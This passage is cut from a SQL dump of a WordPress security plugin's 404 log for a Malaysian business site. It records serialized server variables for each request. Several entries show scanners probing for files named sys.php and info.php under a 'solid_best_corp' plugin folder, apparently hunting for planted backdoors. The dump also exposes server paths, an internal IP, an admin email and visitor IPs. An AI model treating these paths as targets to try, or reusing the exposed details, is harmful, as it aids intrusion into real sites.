23:14:09',35429808,37236264,'https://bintara.com.my/?page_id=11',1,0,'104.160.14.19'),(28180,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:47:\"/old/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:47:\"/old/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaeuLNxKK3Ys46u9IjK8ogAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:69:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:47:\"/old/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeuLNxKK3Ys46u9IjK8ogAAAMk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"55169\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:69:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:47:\"/old/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeuLNxKK3Ys46u9IjK8ogAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571270188.2061\";s:12:\"REQUEST_TIME\";s:10:\"1571270188\";}}','notice','2019-10-16 23:56:31','2019-10-16 23:56:28',35678976,37473272,'https://bintara.com.my/old/wp-content/plugins/solid_best_corp/sys.php',1,0,'37.187.77.211'),(28181,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:48:\"/old/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:48:\"/old/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xaeua9xKK3Ys46u9IjK8wwAAANQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:70:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:48:\"/old/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaeua9xKK3Ys46u9IjK8wwAAANQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"37.187.77.211\";s:11:\"REMOTE_PORT\";s:5:\"35378\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:70:\"https://bintara.com.my/old/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:48:\"/old/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaeua9xKK3Ys46u9IjK8wwAAANQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571270251.3131\";s:12:\"REQUEST_TIME\";s:10:\"1571270251\";}}','notice','2019-10-16 23:57:33','2019-10-16 23:57:31',35057832,36861784,'https://bintara.com.my/old/wp-content/plugins/solid_best_corp/info.php',1,0,'37.187.77.211'),(28182,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4BC586F9-873A-43DF-B0F1-40D478D3FEE6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xae7G4HxTfgsSIq42ax1xAAAAQM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.34.96\";s:11:\"REMOTE_PORT\";s:5:\"51384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xae7G4HxTfgsSIq42ax1xAAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571273499.6812\";s:12:\"REQUEST_TIME\";s:10:\"1571273499\";}}','notice','2019-10-17 00:51:43','2019-10-17 00:51:40',35848048,37644296,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.34.96'),(28183,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-33/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-33/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafBEoHxTfgsSIq42ax6AwAAARY\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-33/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.239\";s:11:\"REMOTE_PORT\";s:5:\"17727\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-33/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-33/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafBEoHxTfgsSIq42ax6AwAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571275026.7618\";s:12:\"REQUEST_TIME\";s:10:\"1571275026\";}}','notice','2019-10-17 01:17:10','2019-10-17 01:17:07',34293200,36094128,'https://bintara.com.my/toughbook-33/',1,0,'157.55.39.239'),(28184,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"162.248.4.8\";s:11:\"REMOTE_PORT\";s:5:\"45584\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafDkYHxTfgsSIq42ax74QAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571275665.9619\";s:12:\"REQUEST_TIME\";s:10:\"1571275665\";}}','notice','2019-10-17 01:27:48','2019-10-17 01:27:46',35408856,37209288,'https://bintara.com.my/?page_id=18/contact.php',1,0,'162.248.4.8'),(28185,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:46:\"/1/wp-content/plugins/solid_best_corp/info.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/info.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:46:\"/1/wp-content/plugins/solid_best_corp/info.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XafVHNxKK3Ys46u9IjLPTAAAAMk\";s:19:\"REDIRECT_SCRIPT_URI\";s:68:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/info.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:46:\"/1/wp-content/plugins/solid_best_corp/info.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafVHNxKK3Ys46u9IjLPTAAAAMk\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"36746\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:68:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/info.php\";s:10:\"SCRIPT_URL\";s:46:\"/1/wp-content/plugins/solid_best_corp/info.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafVHNxKK3Ys46u9IjLPTAAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571280156.8632\";s:12:\"REQUEST_TIME\";s:10:\"1571280156\";}}','notice','2019-10-17 02:42:39','2019-10-17 02:42:37',35270344,37063864,'https://bintara.com.my/1/wp-content/plugins/solid_best_corp/info.php',1,0,'37.187.198.246'),(28186,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/1/wp-content/plugins/solid_best_corp/sys.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/sys.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:45:\"/1/wp-content/plugins/solid_best_corp/sys.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XafVL9xKK3Ys46u9IjLPZwAAAMY\";s:19:\"REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/sys.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:45:\"/1/wp-content/plugins/solid_best_corp/sys.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafVL9xKK3Ys46u9IjLPZwAAAMY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.198.246\";s:11:\"REMOTE_PORT\";s:5:\"42352\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:67:\"https://bintara.com.my/1/wp-content/plugins/solid_best_corp/sys.php\";s:10:\"SCRIPT_URL\";s:45:\"/1/wp-content/plugins/solid_best_corp/sys.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafVL9xKK3Ys46u9IjLPZwAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571280176.0094\";s:12:\"REQUEST_TIME\";s:10:\"1571280176\";}}','notice','2019-10-17 02:42:57','2019-10-17 02:42:56',35044872,36845576,'https://bintara.com.my/1/wp-content/plugins/solid_best_corp/sys.php',1,0,'37.187.198.246'),(28187,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:28:\"https://bintara.com.my/blog/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XafbdL6w7EGsr2YLNHRG@wAAAIU\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:13:\"95.143.218.78\";s:11:\"REMOTE_PORT\";s:5:\"58384\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XafbdL6w7EGsr2YLNHRG@wAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571281780.4759\";s:12:\"REQUEST_TIME\";s:10:\"1571281780\";}}','notice','2019-10-17 03:09:42','2019-10-17 03:09:40',35483496,37283728,'https://bintara.com.my/blog/',1,0,'95.143.218.78'),(28188,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; 